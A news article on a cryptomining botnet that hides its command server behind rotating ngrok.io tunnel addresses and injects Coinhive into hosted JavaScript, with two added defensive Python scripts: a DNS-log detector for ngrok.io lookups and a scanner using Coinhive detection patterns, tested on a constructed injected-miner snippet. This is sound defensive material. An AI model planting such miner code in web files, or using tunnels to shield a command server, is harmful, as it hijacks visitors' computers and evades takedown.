Found a botnet hiding behind a constantly changing address

The new botnet uses ngrok.com to connect bots to the C&C server.

A team of Netlab researchers from the Chinese company Qihoo 360 discovered an unusual botnet used for cryptocurrency mining. Its main difference from other botnets is that the bots do not connect to the remote server directly, but through the ngrok.com service.

ngrok is a simple reverse tunnel service: a client on the user's machine opens an outbound connection to ngrok, and ngrok forwards incoming requests through that tunnel, so servers located behind firewalls or on local machines without a public IP address become reachable from the internet. The service is popular in the corporate sector, since employees can use it to reach their companies' internal networks, and independent developers use it to show customers the applications they are developing. The same property that makes it convenient, an outbound-only tunnel that passes through firewalls and NAT, is exactly what makes it attractive for hiding a C&C server.

Typically, a user runs the ngrok client next to the server on their local computer, registers on the ngrok.com site, and receives a public URL of the form [random_string].ngrok.io. A developer can, for example, hand this link to a customer for a preview of the project under development.

Netlab researchers discovered a botnet whose C&C server sits behind ngrok's network of proxy servers. Among other things, this gives the C&C server good protection against takedown attempts: ngrok URLs stay online for only 12 hours, so by the time security researchers discover the URL of the C&C server it has already changed. This makes the botnet more tenacious than its "colleagues" whose C&C servers sit on popular hosting platforms. For a defender the practical consequence is that a blocklist or indicator keyed on one specific subdomain ages out within hours; detection has to key on the ngrok.io parent domain, or on the bots' outbound behaviour, rather than on any single address.
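As an added example (not code from the Netlab report or from this article), the following Python snippet shows what a detection that survives the address rotation looks like: it parses constructed dnsmasq-style query log lines, flags any lookup of ngrok.io or one of its subdomains on a label boundary (so a look-alike such as evilngrok.io does not match), groups hits by client, and lists the distinct tunnel hostnames seen, which is where the rotation shows up. The log lines, subdomains and client addresses are made up for the example.

```python
import re
from collections import defaultdict

# Constructed sample DNS query log in dnsmasq's "query[A] name from client" format.
# The subdomains and clients are invented; the point is that the ngrok.io subdomain
# used by client 10.0.0.21 differs between the two ~12-hour windows.
SAMPLE_DNS_LOG = """\
Sep 12 01:14:03 dnsmasq[512]: query[A] 2f8a6c1d.ngrok.io from 10.0.0.21
Sep 12 01:14:03 dnsmasq[512]: reply 2f8a6c1d.ngrok.io is 52.14.0.1
Sep 12 02:30:11 dnsmasq[512]: query[A] registry.npmjs.org from 10.0.0.21
Sep 12 13:15:47 dnsmasq[512]: query[A] 9b0e77ad.ngrok.io from 10.0.0.21
Sep 12 13:16:02 dnsmasq[512]: query[A] notngrok.io from 10.0.0.33
Sep 12 13:16:05 dnsmasq[512]: query[A] evilngrok.io from 10.0.0.33
Sep 12 14:00:00 dnsmasq[512]: query[A] 2f8a6c1d.ngrok.io from 10.0.0.44
"""

# Parent domains whose every subdomain is treated as a tunnel endpoint.
# Only ngrok.io is named in the article; other tunnel providers could be added.
TUNNEL_DOMAINS = ("ngrok.io",)

QUERY_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ [\d:]+) \S+ query\[\w+\] (?P<name>\S+) from (?P<client>\S+)$"
)


def is_tunnel_host(name, domains=TUNNEL_DOMAINS):
    """True if name is a tunnel domain or a subdomain of one.

    The check is on a label boundary ("." + domain), so 'evilngrok.io'
    and 'notngrok.io' are not hits. Case and a trailing dot are ignored.
    """
    name = name.lower().rstrip(".")
    return any(name == d or name.endswith("." + d) for d in domains)


def find_tunnel_queries(log_text):
    """Return {client: [(timestamp, queried_name), ...]} for every query line
    that resolves a tunnel host. Reply lines and other hosts are ignored."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = QUERY_RE.match(line)
        if m and is_tunnel_host(m.group("name")):
            hits[m.group("client")].append((m.group("ts"), m.group("name")))
    return dict(hits)


def distinct_subdomains(hits):
    """Distinct tunnel hostnames across all clients. Several different ones
    within a day from the same client is what a rotating C&C address looks like."""
    return {name for entries in hits.values() for _, name in entries}


if __name__ == "__main__":
    found = find_tunnel_queries(SAMPLE_DNS_LOG)
    for client, entries in found.items():
        print(client)
        for ts, name in entries:
            print("  ", ts, name)
    print("distinct tunnel hosts:", sorted(distinct_subdomains(found)))
```

The rule deliberately does not care which random subdomain appears; a hit on any ngrok.io name from a server that has no business exposing a tunnel is the signal, and the list of distinct names per client is the evidence of rotation.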

The botnet consists of four main components: a Scanner module that searches for vulnerable applications, a Reporter responsible for establishing the connection between client and server, a Loader that downloads the payload and infects the host, and a Miner that mines cryptocurrency using the resources of the infected server. There is also a module that looks for Ethereum wallets, but it is not active. Another component injects the Coinhive cryptocurrency miner into every active JavaScript file on the server, which means the botnet also mines Monero in the browsers of visitors to the sites hosted on the infected server.
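As an added example (not code from Netlab, the botnet, or this article), the following Python snippet scans a web root for JavaScript files that carry Coinhive loader or constructor strings, which is the check an administrator of a suspected host would run against the JavaScript-injection component described above. The indicator patterns are the public Coinhive script URL and JavaScript API names as they were documented at the time, chosen by me; the article does not give the exact string the botnet injects, so treat them as a starting point rather than a signature. The sample files are constructed.

```python
import os
import re

# Indicator patterns for the Coinhive in-browser miner. These are the public
# Coinhive loader URL and constructor names as documented at the time, chosen
# for this example; the article does not give the exact injected string.
COINHIVE_PATTERNS = [
    ("coinhive_loader", re.compile(r"coinhive\.com/lib/coinhive(\.min)?\.js", re.I)),
    ("coinhive_ctor", re.compile(r"CoinHive\.(Anonymous|User|Token)\s*\(", re.I)),
    ("authedmine_loader", re.compile(r"authedmine\.com/lib/", re.I)),
]

# Constructed sample content: a clean file and the same file with a miner appended.
CLEAN_JS = "function init(){ document.title = 'hello'; }\ninit();\n"
INJECTED_JS = CLEAN_JS + (
    "var s=document.createElement('script');"
    "s.src='https://coinhive.com/lib/coinhive.min.js';document.head.appendChild(s);\n"
    "s.onload=function(){ var m=new CoinHive.Anonymous('SITEKEY');m.start(); };\n"
)


def find_miner_indicators(js_text):
    """Return [(line_no, indicator_name), ...] for every line matching a pattern.

    Line numbers are 1-based so the hit can be located in the file directly.
    """
    hits = []
    for n, line in enumerate(js_text.splitlines(), start=1):
        for name, pat in COINHIVE_PATTERNS:
            if pat.search(line):
                hits.append((n, name))
    return hits


def scan_js_tree(root):
    """Walk a web root and map each .js path that has indicators to its hits.

    Unreadable files are skipped rather than aborting the scan; the decode
    errors="replace" keeps a binary-looking file from raising mid-walk.
    """
    report = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(".js"):
                continue
            path = os.path.join(dirpath, fn)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = find_miner_indicators(fh.read())
            except OSError:
                continue
            if hits:
                report[path] = hits
    return report


if __name__ == "__main__":
    import tempfile

    # Write the two constructed files into a temporary web root and scan it.
    with tempfile.TemporaryDirectory() as webroot:
        for name, body in (("app.js", CLEAN_JS), ("vendor.js", INJECTED_JS)):
            with open(os.path.join(webroot, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        for path, hits in scan_js_tree(webroot).items():
            print(path, hits)
```

Because the injector touches every active JavaScript file, a match in one file usually means matches in all of them; restoring from a known-good copy and then re-scanning is the sane recovery rather than editing files one by one, and the injected loader will return until the underlying foothold (see the list of exploited applications below) is closed.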

Currently the malware infects servers running applications and content management systems such as Drupal, ModX, Docker, Jenkins, Redis and CouchDB.